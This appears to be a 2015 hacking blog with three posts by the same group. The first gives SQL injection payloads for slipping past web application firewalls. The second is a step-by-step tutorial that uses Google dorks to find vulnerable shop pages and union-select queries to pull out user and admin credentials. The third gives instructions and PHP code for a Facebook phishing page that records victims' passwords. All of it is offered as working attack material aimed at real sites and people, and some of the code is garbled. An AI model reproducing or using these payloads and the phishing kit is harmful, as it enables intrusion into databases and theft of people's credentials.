Sunday, 29 March 2015
WAF = Web Application Firewall Bypass Using SQL Injection
Today I'am Going To Show You How To Bypass Web Application Firewalls (WAF),
Let's Begin!
How To Knw If There Is A Web Application Firewall?
This Is Pretty Simple! When you Try To Enter A Command Used For SQL Injections (Usually The "UNION SELECT" Command), You Get An 403 Error (And The Website Says "Forbidden" Or "Not Acceptable").
Example:
Code: http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4,5....
(WE GET A 403 ERROR)
Basic/Simple Methods:
First, Ofcourse, We Need To Know The Basic Methods To Bypass WAF....
1)Comment's:
You Can Use Comment's To Bypass WAF:
Code: http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT 1,2,3,4,5...
(First Method That Can Bypass WAF)
However, Most WAF Identify This Method So They Still Show A "Forbidden Error"
2) Change The Case Of Latter's:
You Can Also Change The Case Of The Command:
Code: http://www.site.com/index.php?page_id=-15 UnIoN SeLEcT 1,2,3,4,5...
(Another Basic Method To Bypass WAF!)
However, As Before, This Trick Is Also Detected By Most WAF!
3)Combine The Previous Method's:
What You Can Also Do Is To Combine The Previous Two Method's:
Code: http://www.site.com/index.php?page_id=-15 /*!UnIoN*/ /*!SeLecT*/ 1,2,3,4,5....
This Method Is Not Detectable By Many Web Application Firewalls!
4)Replaced Keyword's:
Some Firewalls Remove The "UNION SELECT" Statement When It Is Found In The URL.. We Can Do This To Exploit This Function:
Code: http://www.site.com/index.php?page_id=-15 UNIunionON SELsectECT 1,2,3,4,5...
(The "Union" And The "Select" Will Be Removed, So The Final Result Will Be: "UNION SELECT")
This Method Doesn't Work On A: FIRWALLS, As Only Some Of Them Remove The "UNION" And The "SELECT" Command's When They Are Detected!
5)Inline Comment's
Some Firewalls Get Bypassed By Inserting Inline Comment's Between The "Union" And The "Select"
Command's:
Code: http://www.site.com/index.php?page_id=-15 UnION/**/SElecT 1,2,3,4,5..
(The U Is Equal To "U" And S To "S". See More On The Advanced Sectioons...)
I Believe That These Are The Most basic Method's To WAD Bypassing! Let's Move On More Advanced Ones...
Advanced Method's:
Now That You Have Learned About Basic WAF Bypassing. I Think It Is Good To Understand More Advanced Methods!
1) Buffer Overflow / Firewall Crash:
Many Firewalls Are Developed In C/C++ And We Can Crash Then Using Buffer Overflow!
Code: http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn**/+/*!SeLECt*/+1,2,3,4,5....
( You Can Test If The WAF Can Be Crashed Typing:
?page_id=null
/**//*!50000UnIOn//*yoyu*/all/**/
/*!SeLEct*/
/*nna*/+1,2,3,4,5...
If You Get 500, You Can Exploit It Using Buffer Overflow Method!
2)Replace Characters With Their HEX Values
We Can Replace Some Characters With Their HEX (URL-Encoded) Values.
Example:
Code: http://www.site.com/index.php?page_id=-15 /*!union*/ /*!select*/ 1,2,3,4,5...
(Which Means "UNION SELECT")
Text To Hex Encoder (Choose The "Hec Encoded For URL"
Result!): http://www.swingnote.com/tools/texttohex.php
3) Use Other Variables Commands Instead Of The Common Ones For SQLi:
Apart From The "UNION SELECT" Other Commands Might Be Blocked.
Common Commands Blocked
Code:
COMMAND | WHAT TO USE INSTEAD
@@version | version()
concat() | concat_ws() --> Difference Between Concat() And concat_ws(): http://is.gdVEeiDU
group_concat() | concat_ws()
[!]-> You Can Also Try To SQL Inject With The NAME_CONST Method: http://is.gd/o10i0d (Created By DOWNFALL)
Learning MySQL Really Helps On Such Issues!
4) Misc Exploitable Functions:
Many Firewalls Try To Offer More Protection By Adding Prototype Or Strange Functions! (Which, Ofcource, We Can Exploit!):
Example:
The Firewall Below Replaces "*" (ASTERISKS) With Whitespaces! What We Can Do Is This:
Code: http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4,5....
(If The Firewall Removes The "*", The Result Will Be: 15+union+select...)
So If You Find Such A Sily Function, You Can Exploit It, In This Way!
[+]In Addition To The Previous Example, Some Other Bypasses Might Be:
Code:
-15+(uNioN+(sElECt)...
-15+uNioN+SeleCT)+...
-15+(UnI(oN)+(SeL)(ecT)+..
-15+union (select 1,2,3,4,5...
-15+/*!50000UNION*/+SELECT+1,2,3,4,5...
Team: AnonDevilz
Member/Hacker: Xyb3r D3vil
Thursday, 19 March 2015
How To Hack A Website Using SQL Injection - A Step By Step Tutorial
How To Hack A Website Using SQL Injection - A Step By Step Tutorial
SQL Injection Is A Code Injection Technique That Exploits A Security Vulnerability Occurring In The Database Layer Of An Application. The Vulnerability Is Present When User Input Is Either Incorrectly Filtered For String Literal Escape Characters Embedded In SqQL Statements Or User Input Is Not Strongly Typed And Thereby Unexpectedly Executed. It Is An Instance Od A More General Class Of Culnerabilities Another SQL Injection Attacks Are Also Known As SQL Insertion Attacks.
Step-By-Step Tutorial For SQL Injection
Step 1 Find A Website That Is Vulnerable To The Attack. This Is The First Step In SQLi And Like Every Other Hack Attack Is The Most Time Consuming Step. Once You Get Through This, Rest Is A Cake-walk Now, Let Us All Know What Kind Of Pages Are Vulnerable To This Attack. We Are Providing You With A Few Dorks (Google Strings To Find Vulnerable Sites). Though At The End Of This Post, We'll Provide A List Of Vulnerable Sites.
Dorks:
accinfo.php?cartId=
acclogin.php?cartID=add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
checkout_confirmed.php?order_id=
checkout1.php?cartid=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=
comersus_optReviewReadExec.php?idProduct=
comersus_viewItem.php?idProduct=
comments_form.php?ID=
contact.php?cartId=
content.php?id=
customerService.php?****ID1=
default.php?catID=
description.php?bookid=
details.php?BookID=
details.php?Press_Release_ID=
details.php?Product_ID=
details.php?Service_ID=
display_item.php?id=
displayproducts.php
downloadTrial.php?intProdID=
emailproduct.php?itemid=
emailToFriend.php?idProduct=
events.php?ID=
faq.php?cartID=
faq_list.php?id=
faqs.php?id=
feedback.php?title=
freedownload.php?bookid=
fullDisplay.php?item=
getbook.php?bookid=
GetItems.php?itemid=
giftDetail.php?id=
help.php?CartId=
home.php?id=
index.php?cart=
index.php?cartID=
index.php?ID=
info.php?ID=
item.php?eid=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item_details.php?catid=
item_list.php?maingroup
item_show.php?code_no=
itemDesc.php?CartId=
itemdetail.php?item=
itemdetails.php?catalogid=
learnmore.php?cartID=
links.php?catid=
list.php?bookid=
List.php?CatID=
listcategoriesandproducts.php?idCategory=
modline.php?id=
myaccount.php?catid=
news.php?id=
order.php?BookID=
order.php?id=
order.php?item_ID=
OrderForm.php?Cart=
page.php?PartID=
payment.php?CartID=
pdetail.php?item_id=
powersearch.php?CartId=
price.php
privacy.php?cartID=
prodbycat.php?intCatalogID=
prodetails.php?prodid=
prodlist.php?catid=
product.php?bookID=
product.php?intProdID=
product_info.php?item_id=
productDetails.php?idProduct=
productDisplay.php
productinfo.php?item=
productlist.php?ViewType=Category&CategoryID=
productpage.php
products.php?ID=
And You Can Also Write Your Own.
And Download SQL Websites From Here
How To Check If A Website Is Vulnerable To This Attack?
Once You Execute The Dorks And Get The Preferred Search Results. Say For Example
http://www.website.com/index.php?catid=1
Add A '(APOS) At The End Of The URL. Such That URL Looks Like
http://www.website.com/index.php?catid=1'
If The Page Returns An SQL Error, The Page Is Vulnerable To SQLi. If It Loads Normally, Leave The Page And Move On To The Next Site In The Search Result.
Typical Errors You'll Get After Appending The Apostrophe Are:
Warning:mysql_fetch_array():
Warning:mysql_fetch_assoc():
Warning:mysql_fetch_numrows():
Warning:mysql_fetch_num_rows():
Warning:mysql_fetch_result():
Warning:mysql_fetch_preg_match():
Step 2: Once You Find A Vulnerable Site, You Need To Enumerate The Number Of Columns And Thos Columns That Are Accepting The Quries From You.
Append And 'order by' Statement To The URL.
eg. http://www.website.com.index.php?catid=1 order by 1
Continue Increasing The Number After Order By Till You Get An Error. So The Highest Number For Which You Do Not Get An Errir Is The Number Of Column In The Table. Now To Know The Column NumbersWhich Are Accepting The Queries.
Append An 'Union Select' Statement To The URL. ALso Precede The Number After "id=" With A Hyphen Or Minus.
Say From The Above Step, You Got That The Table Has 6 Columns.
Eg. http://www.website.com/index.php?catid=-1 union select 1,2,3,4,5,6
Result Of This Query Will Be The Column Numbers That Are Accepting The Queris. Say We Get 2,3,4 As The Result. Now We'll Inject Our SQL Statements In Onw Of Thease Columns.
Step 3: Enumerating The SQL Version
We'll Use The Mysql Command @@version() To Get The Version Of The DB. We Have To Inject The Command In One Of The Open Columns. Say We Use Columns Number 2.
eg. http://www.website.com/index.php?catid=-1 union select 1,@@version,3,4,5,6
You'll Get The Version Of The Database Is The Place Where You Had Got The Number 2. If The Startiing Of The Version Number Is 5 Or More, Then You Are Good To Go. If Less Move On To Another Site.
Step 4: Exploit
To Get List Of Databases:
http://www.website.com/index.php?catid=-1 union select 1,group_concat(schema_name)3,4,5,6 from information_schema.schemata--
Result Will Display A List Of Databases On The Site. Here On, We'll Write The Results We Have Gor From Our Test.
Result: information_schema, vrk_mlm
To Know The Current Databse In Use:
http://www.website.com/index.php?catid=-1 union select 1,concat(databse()),3,4,5,6--
Result: vrk_mlm
To Get The Current User:
http://www.website.com/index.php?catid=-1 union select 1,concat(user()),3,4,5,6--
Result: vrk_4mlm@localhost
To Get The Tables:
http://www.website.com/index.php?catid=-1 union select 1,group_concat(table_name)3,4,5,6 from information_schema.tables where table_schema=database()--
Result: administrator,category,product,users
We'll Concentrate Our Attack On The Users Table.
To Get The Columns:
http://www.website.com/index.php?catid=-1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_Schema=database()--
Result: admin_id,user_name,password,user_type,status,catID,catName,prodId,catID,prodName,prodDesc,prodKeyword,prodPrice,prodPrice,prodImage,id,incredible_id,f_name,m_name,l_name,refered_by_id,refered_direct_to_ids,refered_toids,no_of_direct_reterals,credits,position,email_id,password,editied_on,last_login,created_on,chain_number,phone,address
By Looking At The Columns Closely, And The Order Of The Tables, We Can Conclude That Starting From if,incredible_id Are The Columns Belonging To THe Users Table And We Are Intrested In That.
Extract Information:
union select group_concat(id,ox3a,incredible_od,ox3a,f_name,ox3a,m_name,ox3a,l_name,ox3a,refered_by_idox3a,refered_direct_to_ids,ox3a) from vrk_mlm.users--
Now You Will Get The Admin User Name And Password....
Team: AnonDevilz
Member/Hacker: Xyb3r D3vil
Wednesday, 18 March 2015
How To Hack Facebook Account Using Phishing
How To Hack Facebook Account Using Phishing Page (Fake Page)
Steps To Creat Phishing Page:
1. Go To The Facebook Page , And Then Right Click On The Page, You Will See The Option VIEW SOURCE PAGE , Click On That.
2. Now A New Tab Will Open Which Contaun A Source Code, Select All The Stuff And Paste It In A Notepad.
3. Now Open The Notepad And Press CTRL + F, And Type ACTION.
4. You Will Have To Find A Text Which Looks Like...
action="https://www.facebook.com/login.php?login attempt=1"
5. Now Change The Text To post.php. Then It Will Look Like...
action="post.php"
6.Now Save It On your Desktop Woth the Name index.htm , Not index.html ,Remember.
7. Now Your Phishing Page Is Ready. It Will Look Like A Facebook Login Page.
8. Open A New Notepad And Save The Given Data With The Name post.php
<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("username.txt","a");
foreach($_POST as $variable => $value) {
fwrite)handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
9. You Have 2 Files Now One Is index.htm And Another Is post.php , Remember File Extension Is Important.
10. Now You Have To Upload It In A WEB HOSTING Site , I Prefer You To Use 000webhosting or else My3gb.
11. I Prefer You To Use 000webhost Because It Will Be Easy To Use.
12. You Have To Make A Account In That.
13. Now Go CONTROL PANEL , Then On FILE MANAGER .
14. After That A New Window Will Pop-up, Now Go To public_html .
15. Delete The File Named Default.php , After That Upload 2 Files index.htm And post.php One By One.
16. Now The Last Step Click On View Of index.htm It Will Look Same As Facebook Page.
17. Copy The URL Of That Page And Send this Link To Your Victim, When Your Victim Try To Log In To It With The Username And Password. The Page Redirectly Connect To Facebook. And You Will Be Now Able To See His Password.
18. Open Your 000webhost Account And Go To File Manager Then Public_html , Here You Find A New File Named username.txt
19. Click On View Now You Will Have Your Friend's Password And Email Id.
You Can Download Phishing Script's From This Download Link: 34 In 1 Mega Pack Of Phishing
Hacker: Xyb3r D3vil
Team: AnonDevilz
Comment If You Face Any Problem...
Tuesday, 17 March 2015
Monday, 9 March 2015
Download Back|Track 5 R3 - KDE 32, 64,
Back|Track 5 R3 - KDE
Download Link: Back|Track 5 R3 - KDE 32 Bit
Download Link: Back|Track 5 R3 - KDE 64 Bit
How To Download:
Official Page: Xyb3r D3vil
